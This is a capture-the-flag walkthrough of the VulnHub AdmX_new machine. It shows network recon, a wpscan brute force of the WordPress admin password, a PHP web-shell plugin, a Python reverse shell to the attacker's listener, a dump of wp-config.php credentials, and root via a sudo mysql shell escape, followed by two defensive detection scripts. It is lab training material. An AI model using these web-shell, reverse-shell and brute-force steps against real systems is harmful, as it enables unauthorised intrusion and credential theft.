Target machine: AdmX_new
Preparation
- Target: https://download.vulnhub.com/admx/AdmX_new.7z
- After downloading, verify the MD5: 2948034da23a8acc1285fd40ffcde827. The purpose of the check is to confirm that the downloaded file is neither corrupted nor otherwise tampered with.
  - Verify from cmd:
    certutil -hashfile <file path> MD5
  - Verify from PowerShell:
    Get-FileHash <file path> -Algorithm MD5 | Format-List
- Use VirtualBox
- Network: Host-Only
- Configuring the network environment: https://www.cnblogs.com/shadow-/p/16815020.html
  - kali: NAT + [ Bridged/Host-Only ]
Special note: the internal network configuration of AdmX_new has problems and needs adjusting.
This target runs Ubuntu 20.04.
- Ubuntu network configuration changes: net-tools --> iproute2; the ifup/ifdown commands and the /etc/network/interfaces file are deprecated in favour of the netplan command and configuration files under /etc/netplan/*.yaml.
- Details on netplan: https://netplan.io/reference
Fixing the target's network configuration [take a snapshot before performing the steps below]
- While the target is booting (screen still black, during the VirtualBox transition animation), hold Shift to enter the GRUB boot menu
- Use the up/down keys to move to the recovery mode entry on the second line and press e
- Find the line containing ro recovery nomodeset ... and change it to rw single init=/bin/bash. What follows ro recovery nomodeset may differ; the ellipsis stands for the rest of the line
- After editing, press Ctrl + X to enter single-user mode. If this is unfamiliar, look it up [the core goal is to enter the target directly as root through single-user mode]
- Run ip a to check the network state and find the name of the faulty NIC; mine was enp0s17. If you are not familiar with this, learn the basics of Linux network interfaces first
- Edit the network configuration with vim /etc/netplan/*.yaml. There should be only one yaml configuration file under /etc/netplan/, and that is our target:

  ```yaml
  # This file describes the network interfaces available on your system
  # For more information, see netplan(5).
  network:
    version: 2
    renderer: networkd
    ethernets:
      enp0s3:
        dhcp4: true
      enp0s17:
        addresses: [192.168.56.200/24]
        gateway4: 192.168.56.1
        nameservers:
          addresses: [192.168.56.100]
  ```

  The ethernets section is the important part. There are two NICs: enp0s3 is the default and can be left alone; the added enp0s17 is the faulty NIC name we found earlier. Under enp0s17, addresses is the statically assigned IP, gateway4 is the gateway, and addresses under nameservers is the name server entry, filled here with the DHCP server address
- The gateway and DHCP server address come from VirtualBox: Manage --> Host Network Manager --> the adapter you use for the target under Host-Only; the adapter and DHCP server details are shown there
- After completing the yaml configuration file, run netplan apply to make the configuration take effect
- Details on Ubuntu 20.04 network configuration: https://ubuntu.com/server/docs/network-configuration
Attack walkthrough
Discovering the target
Use arp-scan; the target 192.168.56.200 is found.

```console
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l -I eth1
Interface: eth1, type: EN10MB, MAC: 08:00:27:ad:7a:24, IPv4: 192.168.56.111
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0d       (Unknown: locally administered)
192.168.56.100  08:00:27:53:45:e0       PCS Systemtechnik GmbH
192.168.56.200  08:00:27:a3:25:25       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.144 seconds (119.40 hosts/sec). 3 responded
```

- The -I parameter specifies the interface to scan on. The network the target is attached to is eth1, so the scanning interface must be given explicitly; the long form is --interface=, abbreviated as -I
Use nmap for a port scan. Port 80 on the target is open, and the service is an http service, Apache httpd 2.4.41.

```console
┌──(kali㉿kali)-[~]
└─$ nmap -A -T4 192.168.56.200
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-31 19:30 CST
Nmap scan report for 192.168.56.200
Host is up (0.0014s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.19 seconds
```

- The -A parameter enables operating system and version detection
- The -T4 parameter speeds up execution
Probing the target's http service
Visiting http://192.168.56.200:80/ in a browser shows only the Apache httpd 2.4.41 default page, so we should crawl http://192.168.56.200:80/ for hidden or unknown pages. For this we use dirsearch to brute-force directories and files on the web server.

```console
┌──(kali㉿kali)-[~]
└─$ dirsearch --url=192.168.56.200:80/

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/80-_22-10-31_19-42-33.txt

Error Log: /home/kali/.dirsearch/logs/errors-22-10-31_19-42-33.log

Target: http://192.168.56.200:80/

[19:42:33] Starting:
[19:42:37] 403 -  279B  - /.htaccess_orig
[19:42:37] 403 -  279B  - /.htaccess.sample
[19:42:37] 403 -  279B  - /.htaccess_extra
[19:42:37] 403 -  279B  - /.ht_wsr.txt
[19:42:37] 403 -  279B  - /.htaccess.orig
[19:42:37] 403 -  279B  - /.htaccessBAK
[19:42:37] 403 -  279B  - /.htaccess_sc
[19:42:37] 403 -  279B  - /.htaccessOLD
[19:42:37] 403 -  279B  - /.htaccess.bak1
[19:42:37] 403 -  279B  - /.htaccess.save
[19:42:37] 403 -  279B  - /.html
[19:42:37] 403 -  279B  - /.htm
[19:42:37] 403 -  279B  - /.htpasswd_test
[19:42:37] 403 -  279B  - /.htpasswds
[19:42:37] 403 -  279B  - /.htaccessOLD2
[19:42:37] 403 -  279B  - /.httr-oauth
[19:42:39] 403 -  279B  - /.php
[19:43:33] 200 -   11KB - /index.html
[19:44:05] 403 -  279B  - /server-status/
[19:44:05] 403 -  279B  - /server-status
[19:44:18] 403 -  279B  - /tools/
[19:44:18] 301 -  316B  - /tools  ->  http://192.168.56.200/tools/
[19:44:28] 200 -    7KB - /wordpress/wp-login.php
[19:44:28] 200 -    8KB - /wordpress/

Task Completed
```

- Live targets returning 200:
  http://192.168.56.200:80/index.html
  http://192.168.56.200:80/wordpress/wp-login.php
  http://192.168.56.200:80/wordpress
- And one notable 301:
  http://192.168.56.200:80/tools
Visiting http://192.168.56.200:80/wordpress/ with Firefox, the page takes very long to load and is visibly incomplete. Looking at the page source, the HTML contains references that wrongly point to 192.168.159.145. We need to either redirect those requests or rewrite the response content; the available methods are:
- Capture and modify the responses with Burp Suite
- Use the browser extension Redirector
  This method also solves the googleapis problem: many foreign technical sites still use Google APIs services, and anyone who has used them will have noticed that parts of those sites are missing, because the Google APIs services cannot be reached from within China. Mirror sites exist in China, and redirecting with this extension gives indirect access
- Use Mitmproxy
We use Mitmproxy here.
- Make sure Mitmproxy is installed on your Kali
- Start the program with the command mitmproxy
- Pressing ctrl + shift + d splits the terminal into an upper and a lower pane: the upper pane is Mitmproxy's TUI, the lower one is the Bash CLI. This is only for convenience; skip it if you already know it
- In Mitmproxy, the : key enters command mode; run
  set map_remote '|~m GET|//192.168.159.145/|//192.168.56.200/'
  to set up the redirect
- In Firefox, configure a proxy: Manual proxy configuration --> HTTP Proxy, proxy address 127.0.0.1:8080
- Visit http://192.168.56.200:80/wordpress/ again
After some exploration nothing special turns up, so we use dirsearch to brute-force http://192.168.56.200:80/wordpress/

```console
┌──(kali㉿kali)-[~/.mitmproxy]
└─$ dirsearch --url=192.168.56.200:80/wordpress

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/80-wordpress_22-11-01_12-33-29.txt

Error Log: /home/kali/.dirsearch/logs/errors-22-11-01_12-33-29.log

Target: http://192.168.56.200:80/wordpress/

[12:33:30] Starting:
[12:33:40] 403 -  279B  - /wordpress/.ht_wsr.txt
[12:33:41] 403 -  279B  - /wordpress/.htaccess.sample
[12:33:41] 403 -  279B  - /wordpress/.htaccess.orig
[12:33:41] 403 -  279B  - /wordpress/.htaccess.bak1
[12:33:41] 403 -  279B  - /wordpress/.htaccess_extra
[12:33:41] 403 -  279B  - /wordpress/.htaccess.save
[12:33:41] 403 -  279B  - /wordpress/.htaccess_orig
[12:33:41] 403 -  279B  - /wordpress/.htaccessOLD
[12:33:41] 403 -  279B  - /wordpress/.htaccess_sc
[12:33:41] 403 -  279B  - /wordpress/.htaccessOLD2
[12:33:41] 403 -  279B  - /wordpress/.htaccessBAK
[12:33:41] 403 -  279B  - /wordpress/.htm
[12:33:41] 403 -  279B  - /wordpress/.httr-oauth
[12:33:41] 403 -  279B  - /wordpress/.htpasswd_test
[12:33:41] 403 -  279B  - /wordpress/.htpasswds
[12:33:41] 403 -  279B  - /wordpress/.html
[12:33:46] 403 -  279B  - /wordpress/.php
[12:33:55] 301 -    0B  - /wordpress/0  ->  http://192.168.56.200/wordpress/0/
[12:34:05] 301 -    0B  - /wordpress/Citrix//AccessPlatform/auth/clientscripts/cookies.js  ->  http://192.168.56.200/wordpress/Citrix/AccessPlatform/auth/clientscripts/cookies.js
[12:34:09] 301 -    0B  - /wordpress/New%20folder%20(2)  ->  http://192.168.56.200/wordpress/New%20folder%20(2
[12:34:09] 301 -    0B  - /wordpress/PMA2/index.php  ->  http://192.168.56.200/wordpress/PMA2/
[12:34:10] 301 -    0B  - /wordpress/PMA/index.php  ->  http://192.168.56.200/wordpress/PMA/
[12:34:28] 301 -    0B  - /wordpress/adm/index.php  ->  http://192.168.56.200/wordpress/adm/
[12:34:29] 302 -    0B  - /wordpress/admin  ->  http://192.168.159.145/wordpress/wp-admin/
[12:34:30] 301 -    0B  - /wordpress/admin.  ->  http://192.168.56.200/wordpress/admin
[12:34:31] 302 -    0B  - /wordpress/admin/  ->  http://192.168.159.145/wordpress/wp-admin/
[12:34:32] 301 -    0B  - /wordpress/admin/index.php  ->  http://192.168.56.200/wordpress/admin/
[12:34:33] 301 -    0B  - /wordpress/admin/mysql/index.php  ->  http://192.168.56.200/wordpress/admin/mysql/
[12:34:33] 301 -    0B  - /wordpress/admin/mysql2/index.php  ->  http://192.168.56.200/wordpress/admin/mysql2/
...
...
...
[12:38:02] 301 -    0B  - /wordpress/wp-register.php  ->  http://192.168.159.145/wordpress/wp-login.php?action=register
[12:38:02] 200 -  630B  - /wordpress/wp-json/wp/v2/users/
[12:38:02] 200 -   96KB - /wordpress/wp-json/
[12:38:02] 302 -    0B  - /wordpress/wp-signup.php  ->  http://192.168.159.145/wordpress/wp-login.php?action=register
[12:38:02] 200 -   49KB - /wordpress/wp-includes/
[12:38:02] 301 -    0B  - /wordpress/www/phpMyAdmin/index.php  ->  http://192.168.56.200/wordpress/www/phpMyAdmin/
[12:38:03] 301 -    0B  - /wordpress/xampp/phpmyadmin/index.php  ->  http://192.168.56.200/wordpress/xampp/phpmyadmin/
[12:38:03] 405 -   42B  - /wordpress/xmlrpc.php
```
- This time there are clearly major findings; focus on the entries with status 200 and 301
- Some familiarity with WordPress is needed here to quickly tell which entries deserve closer inspection
- The key one is the login page /wordpress/wp-login.php, which logs in to the admin backend
Here we use wpscan, a tool specific to WordPress, against http://192.168.56.200/wordpress/. Note that wpscan has to be run through the proxy.

```console
┌──(kali㉿kali)-[~/workspace]
└─$ wpscan --url http://192.168.56.200/wordpress/ --proxy http://127.0.0.1:8080
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.56.200/wordpress/ [192.168.56.200]
[+] Started: Tue Nov  1 20:20:27 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.200/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.200/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.200/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.200/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.7.1 identified (Insecure, released on 2021-04-15).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.200/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7.1'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.200/wordpress/, Match: 'WordPress 5.7.1'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:08 <==============================================> (137 / 137) 100.00% Time: 00:00:08

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Nov  1 20:20:46 2022
[+] Requests Done: 164
[+] Cached Requests: 4
[+] Data Sent: 53.828 KB
[+] Data Received: 106.023 KB
[+] Memory used: 193.719 MB
[+] Elapsed time: 00:00:19
```

- The proxy is needed because of the server-side redirect described earlier
- We find that the WordPress version is 5.7.1
After confirming that wpscan works, use the following command to brute-force the WordPress backend password:
wpscan --url http://192.168.56.200/wordpress/ -P ./password.txt -U admin --proxy http://127.0.0.1:8080

```console
┌──(kali㉿kali)-[~/workspace]
└─$ wpscan --url http://192.168.56.200/wordpress/ -P ./password.txt -U admin --proxy http://127.0.0.1:8080
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[proxychains] Strict chain  ...  127.0.0.1:8080  ...  192.168.56.200:80  ...  OK
[+] URL: http://192.168.56.200/wordpress/ [192.168.56.200]
[+] Started: Tue Nov  1 18:41:55 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.200/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.200/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.200/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.200/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.7.1 identified (Insecure, released on 2021-04-15).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.200/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7.1'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.200/wordpress/, Match: 'WordPress 5.7.1'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:04 <==============================================> (137 / 137) 100.00% Time: 00:00:04

[i] No Config Backups Found.

[SUCCESS] - admin / adam14
Trying admin / Adm123 Time: 00:00:01 <====                                          > (20 / 236)  8.47%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: admin, Password: adam14

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Nov  1 18:42:07 2022
[+] Requests Done: 160
[+] Cached Requests: 30
[+] Data Sent: 49.889 KB
[+] Data Received: 61.955 KB
[+] Memory used: 204.188 MB
[+] Elapsed time: 00:00:12
```

- Breaking down the command proxychains wpscan --url http://192.168.56.200/wordpress/ -P ./password.txt -U admin
  - proxychains is the proxy, which should be self-explanatory
  - The -P parameter gives the password dictionary for the brute force; ./password.txt is the dictionary
  - The -U parameter gives the account to brute-force; we specify the user admin, since we want administrative rights
- The brute force reveals the key item: the password is adam14
  [!] Valid Combinations Found:
   | Username: admin, Password: adam14
About password dictionaries:
- It is recommended to search online for high-quality weak-password dictionaries
- Dictionaries generated by hand with tools such as john, hydra and crunch tend to be very large
- Or use Kali's built-in dictionaries [generally somewhat lacking]
The brute force above could also be done with john or hydra, but that is more involved. wpscan is a targeted attack; in a penetration test, using an attack targeted at the type of system in front of you is more efficient.
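From the defender's side, the wpscan brute force above leaves a distinctive trace: a burst of POST requests to wp-login.php (or xmlrpc.php) from a single client. The following Python script is an added example, not part of the original write-up; it parses Apache combined-format access log lines (constructed here, not taken from the target) and flags any client that posts to a WordPress login endpoint ten or more times within a one-minute sliding window. The threshold, the window and the log format are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log format: ip ident user [ts] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# WordPress endpoints that accept credentials: wp-login.php (what wpscan -U/-P
# drives) and xmlrpc.php (the other login channel wpscan reported as enabled).
AUTH_PATHS = ("/wp-login.php", "/xmlrpc.php")


def parse_line(line):
    """Parse one combined-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect_login_bruteforce(lines, threshold=10, window=timedelta(minutes=1)):
    """Return {ip: total_auth_posts} for clients that POST to an auth endpoint at
    least `threshold` times inside some sliding `window` (assumed thresholds)."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].split("?")[0].endswith(AUTH_PATHS):
            posts[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, stamps in posts.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:   # drop events that fell out of the window
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(stamps)
                break
    return flagged


def constructed_log(n_attempts=20):
    """Constructed sample (not from the target): one client firing n_attempts POSTs at
    wp-login.php one second apart, plus benign traffic from a second client."""
    base = datetime(2022, 11, 1, 18, 41, 55)
    lines = []
    for i in range(n_attempts):
        ts = (base + timedelta(seconds=i)).strftime("%d/%b/%Y:%H:%M:%S +0800")
        lines.append(f'192.168.56.111 - - [{ts}] "POST /wordpress/wp-login.php HTTP/1.1" 200 3412 '
                     f'"-" "WPScan v3.8.22 (https://wpscan.com/wordpress-security-scanner)"')
    lines.append('192.168.56.50 - - [01/Nov/2022:18:41:57 +0800] "GET /wordpress/ HTTP/1.1" '
                 '200 8120 "-" "Mozilla/5.0"')
    lines.append('192.168.56.50 - - [01/Nov/2022:18:42:30 +0800] "POST /wordpress/wp-login.php '
                 'HTTP/1.1" 302 0 "-" "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    print(detect_login_bruteforce(constructed_log()))   # {'192.168.56.111': 20}
```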
Attacking the WordPress admin backend
We know the WordPress version is 5.7.1 and we are in its admin interface. Options:
- Media tab: upload a web shell
- Appearance -> Theme Editor tab: inject into the 404 template page
- Attack through a WordPress plugin
Here we choose the plugin attack, since it gives more room to work with.
- Write a plugin, upload and install it into WordPress, and activate it:

  ```php
  <?php
  /*
  Plugin Name: WebShell
  Plugin URI: https://yunju.blog.csdn.net/
  Description: mu
  Author: myname
  Version: 1.0
  Author URI: https://yunju.blog.csdn.net/
  */
  if (isset($_GET['cmd'])) {
      system($_GET['cmd']);
  }
  ?>
  ```

- Test it in the browser at http://192.168.56.200/wordpress/wp-content/plugins/shell.php?cmd=id
- Start a matching listener locally: netcat -nvlp 4444
- Testing shows that python3 exists on the target
- Try a Python reverse shell:

  ```python
  import os, subprocess, socket
  # create the socket; AF_INET means IPv4, SOCK_STREAM means stream-oriented TCP
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  # connect back to the listener
  s.connect(('192.168.56.111', 4444))
  # redirect stdin, stdout and stderr to the socket so the shell's I/O travels over it
  os.dup2(s.fileno(), 0)
  os.dup2(s.fileno(), 1)
  os.dup2(s.fileno(), 2)
  # spawn the shell
  p = subprocess.call(["/bin/sh", "-i"])
  ```

  Compressed onto one line so it can be passed to python3 -c:
  import os,subprocess,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.111",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
  Build the command
  python3 -c 'import os,subprocess,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.111",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  and substitute it for id in the request
- metasploit-framework can also be used for the attack

```console
┌──(kali㉿kali)-[~/workspace]
└─$ netcat -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.56.111] from (UNKNOWN) [192.168.56.200] 36466
bash: cannot set terminal process group (990): Inappropriate ioctl for device
bash: no job control in this shell
www-data@wp:/var/www/html/wordpress/wp-content/plugins/shell$
```
Privilege escalation
First determine the system information with uname -a

```console
www-data@wp:/var/www/html/wordpress$ uname -a
uname -a
Linux wp 5.4.0-72-generic #80-Ubuntu SMP Mon Apr 12 17:35:00 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
```

Since we are attacking WordPress, do not forget to look at its configuration file wp-config.php

```console
www-data@wp:/var/www/html/wordpress$ cat wp-config.php
cat wp-config.php
<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'admin' );
define( 'DB_PASSWORD', 'Wp_Admin#123' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8mb4' );
define( 'DB_COLLATE', '' );
define( 'AUTH_KEY', '-=<%h-&zmo1#bWHqHEib?bJt!)mOL7E+j{x7x;Hsc}t?xm?=kRfunrRmTUP;#8OS' );
define( 'SECURE_AUTH_KEY', 'A5#uw+^B_f:K]WNq@aoXLpD@bmMD/hev^UAf,^lTCX3@a1&7A(qLFS_{I=pYw(ET' );
define( 'LOGGED_IN_KEY', '~*TFb3]y1^|G9j%?Z@F[63A+AAT<mndFo-H{q0P#Nz/qYN3da@UXyY6YP6`7QNmy' );
define( 'NONCE_KEY', 'bP88<WoD?9;eN0yM9A{+])!$(k[zp{:-.ZS6Fk*snlJN&GXU6Zy_)wEbqk>-? nn' );
define( 'AUTH_SALT', 'SX%VenTL%k&f%i8tFAhtf#svIc|nt.&t~R%zp=:n:Q%e0Ux?k,-j?ZAjZZ%;w1ih' );
define( 'SECURE_AUTH_SALT', '-e Z<w<q8F~Tm7IeNu2nSa^or=*B?bV*yRBa+4; My}cIJ]?L%j14RWghI,D^M^5' );
define( 'LOGGED_IN_SALT', '}Z}fYC%Mv;;ON/h~$c2c,u[FZ>`YaiscN6UY&HCcXUVl{miUbX4a/ LdJ^AoL/Z{' );
define( 'NONCE_SALT', 'BQPaC,#p}PEcU^eC*Hwss>9~UCEKhv]tox~PN)?B.kSn%tC)V~pZ6RpOBR>80o5+' );
$table_prefix = 'wp_';
define( 'WP_DEBUG', false );
if ( ! defined( 'ABSPATH' ) ) {
    define( 'ABSPATH', __DIR__ . '/' );
}
```

- This directly gives the MySQL user admin and password Wp_Admin#123
- But logging in with them fails
We can also look at the home directories: ls /home reveals a user wpadmin. We can try guessing the earlier password adam14.
- It logs in. After that, cd ~ finds the first flag:

```console
wpadmin@wp:~$ cd ~ && ls
cd ~ && ls
local.txt
wpadmin@wp:~$ cat local.txt
cat local.txt
153495edec1b606c24947b1335998bd9
```
Second privilege escalation
Checking sudo -l shows that /usr/bin/mysql -u root -D wordpress -p can be run unconditionally, as root and without a password

```console
wpadmin@wp:~$ sudo -l
sudo -l
Matching Defaults entries for wpadmin on wp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wpadmin may run the following commands on wp:
    (root) NOPASSWD: /usr/bin/mysql -u root -D wordpress -p
```

- The password guess is again adam14
- Inside mysql, the system command runs commands at root level
- \! /bin/bash gives a root bash
proof.txt in the root user's home directory is the last flag, and with that the box is done.
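The root cause of this second escalation is a sudo rule that lets a low-privileged user run an interactive client (mysql, with its system and \! escapes) as root without a password. The following Python script is an added example, not part of the original write-up; it parses the text of sudo -l output (the sample below is a reconstruction of the output shown above) and reports root rules for interactive clients that carry a shell escape, together with the fix a defender would apply. The set of flagged binaries and the wrapper-script remediation are assumptions.

```python
import os
import re

# Interactive clients that expose a shell escape once running; executing one as
# root via sudo hands over a root shell. mysql (`system`, `\!`) is the case on
# this box. Assumed list: extend it with the interactive tools your hosts install.
INTERACTIVE_WITH_SHELL_ESCAPE = {"mysql"}

# One rule line of `sudo -l` output, e.g. "(root) NOPASSWD: /usr/bin/mysql -u root ..."
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$')

# Constructed copy of the sudo -l output shown above (raw string keeps the "\:" as-is).
SAMPLE_SUDO_L = r"""Matching Defaults entries for wpadmin on wp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wpadmin may run the following commands on wp:
    (root) NOPASSWD: /usr/bin/mysql -u root -D wordpress -p
"""


def parse_sudo_l(text):
    """Return (runas, tags, command) tuples from the rules part of `sudo -l` output."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True          # everything after this header is a rule line
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            tags = {t.rstrip(":") for t in m.group("tags").split()}
            rules.append((m.group("runas"), tags, m.group("cmd")))
    return rules


def audit_sudo_l(text):
    """Return one finding per rule that runs a shell-escaping interactive client as root."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(text):
        target_user = runas.split(":")[0].strip()      # "(root)" or "(ALL : ALL)"
        if target_user not in ("root", "ALL"):
            continue
        binary = os.path.basename(cmd.split()[0])
        if binary in INTERACTIVE_WITH_SHELL_ESCAPE:
            findings.append({
                "command": cmd,
                "nopasswd": "NOPASSWD" in tags,
                "reason": f"{binary} runs as root and has a built-in shell escape",
                "fix": "grant a fixed, non-interactive wrapper script that runs the needed "
                       "query instead of the client itself, and drop NOPASSWD",
            })
    return findings


if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"[!] {f['command']} (NOPASSWD={f['nopasswd']}): {f['reason']}")
        print(f"    fix: {f['fix']}")
```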